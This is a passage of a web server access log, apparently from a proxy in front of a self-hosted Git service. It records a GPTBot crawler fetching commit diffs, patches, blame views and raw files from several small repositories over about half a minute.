GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e" +[17/Feb/2026:13:08:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 146723] [Gzip 20.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/favicon.ico" +[17/Feb/2026:13:08:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" [Client 74.7.227.38] [Length 10435] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" +[17/Feb/2026:13:08:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a.diff" [Client 74.7.227.38] [Length 63098] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" +[17/Feb/2026:13:08:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a.patch" [Client 74.7.227.38] [Length 63577] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" +[17/Feb/2026:13:08:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6.diff" [Client 74.7.227.38] [Length 1320643] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6" +[17/Feb/2026:13:08:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec.patch" [Client 74.7.227.38] [Length 818493] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:08:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6.patch" [Client 74.7.227.38] [Length 4652900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6" +[17/Feb/2026:13:08:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f.patch" [Client 74.7.227.38] [Length 12243] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f" +[17/Feb/2026:13:08:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/App.tsx" [Client 74.7.227.38] [Length 9861] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/App.tsx" +[17/Feb/2026:13:08:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/README.md" [Client 74.7.227.38] [Length 10955] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/README.md" +[17/Feb/2026:13:08:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode" [Client 74.7.227.38] [Length 9857] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode" +[17/Feb/2026:13:08:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/App.tsx" +[17/Feb/2026:13:08:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/README.md" +[17/Feb/2026:13:08:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/README.md" [Client 74.7.227.38] [Length 11306] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" +[17/Feb/2026:13:08:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/README.md" [Client 74.7.227.38] [Length 11307] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" +[17/Feb/2026:13:08:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" [Client 74.7.227.38] [Length 14935] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" +[17/Feb/2026:13:08:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f.diff" [Client 74.7.227.38] [Length 11600] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f" +[17/Feb/2026:13:08:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8" [Client 74.7.227.38] [Length 14825] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8" +[17/Feb/2026:13:08:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/App.tsx" [Client 74.7.227.38] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/App.tsx" +[17/Feb/2026:13:09:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c.diff" [Client 74.7.227.38] [Length 133969] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" +[17/Feb/2026:13:09:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/find/commit/3181052619700dceeeef81a9a0851130498f177e" [Client 74.7.227.38] [Length 7500] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e" +[17/Feb/2026:13:09:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/App.tsx" [Client 74.7.227.38] [Length 12480] [Gzip 5.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/App.tsx" +[17/Feb/2026:13:09:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/README.md" [Client 74.7.227.38] [Length 11301] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:13:09:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/README.md" [Client 74.7.227.38] [Length 11303] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" +[17/Feb/2026:13:09:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/README.md" [Client 74.7.227.38] [Length 10953] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/README.md" +[17/Feb/2026:13:09:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/README.md" [Client 74.7.227.38] [Length 10950] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/README.md" +[17/Feb/2026:13:09:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/.gitignore" [Client 74.7.227.38] [Length 12025] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" +[17/Feb/2026:13:09:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/README.md" +[17/Feb/2026:13:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/.gitignore" [Client 74.7.227.38] [Length 10981] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8" +[17/Feb/2026:13:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/README.md" +[17/Feb/2026:13:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/3e4db647c22a7292965a613e62ce815b9da823a8" [Client 74.7.227.38] [Length 7491] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8" +[17/Feb/2026:13:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" [Client 74.7.227.38] [Length 12082] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" +[17/Feb/2026:13:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" [Client 74.7.227.38] [Length 7486] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" +[17/Feb/2026:13:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/README.md" [Client 74.7.227.38] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/README.md" +[17/Feb/2026:13:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/README.md" [Client 74.7.227.38] [Length 10939] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/README.md" +[17/Feb/2026:13:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/README.md" [Client 74.7.227.38] [Length 10950] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/README.md" +[17/Feb/2026:13:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8" [Client 74.7.227.38] [Length 11277] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8" +[17/Feb/2026:13:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/.gitignore" [Client 74.7.227.38] [Length 500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/.gitignore" +[17/Feb/2026:13:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/.gitignore" [Client 74.7.227.38] [Length 11833] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/.gitignore" +[17/Feb/2026:13:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/.gitignore" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/.gitignore" +[17/Feb/2026:13:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/.gitignore" [Client 74.7.227.38] [Length 9994] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/.gitignore" +[17/Feb/2026:13:09:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/.gitignore" [Client 74.7.227.38] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/.gitignore" +[17/Feb/2026:13:09:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/.gitignore" [Client 74.7.227.38] [Length 10135] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/.gitignore" +[17/Feb/2026:13:09:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" [Client 74.7.227.38] [Length 15189] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" +[17/Feb/2026:13:09:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/graph" [Client 74.7.227.38] [Length 11573] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" +[17/Feb/2026:13:09:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" [Client 74.7.227.38] [Length 14803] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" +[17/Feb/2026:13:09:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor" [Client 74.7.227.38] [Length 12337] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" +[17/Feb/2026:13:09:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/README.md" +[17/Feb/2026:13:09:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/README.md" [Client 74.7.227.38] [Length 11303] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" +[17/Feb/2026:13:09:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/README.md" [Client 74.7.227.38] [Length 11300] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" +[17/Feb/2026:13:09:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/README.md" +[17/Feb/2026:13:09:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1.patch" [Client 74.7.227.38] [Length 12149236] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1" +[17/Feb/2026:13:09:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 28937] [Gzip 10.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js" +[17/Feb/2026:13:09:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec.diff" [Client 74.7.227.38] [Length 801462] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:09:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 15238] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" +[17/Feb/2026:13:09:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d.patch" [Client 74.7.227.38] [Length 2981] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" +[17/Feb/2026:13:09:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/.gitignore" [Client 74.7.227.38] [Length 12027] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" +[17/Feb/2026:13:09:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 12207] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 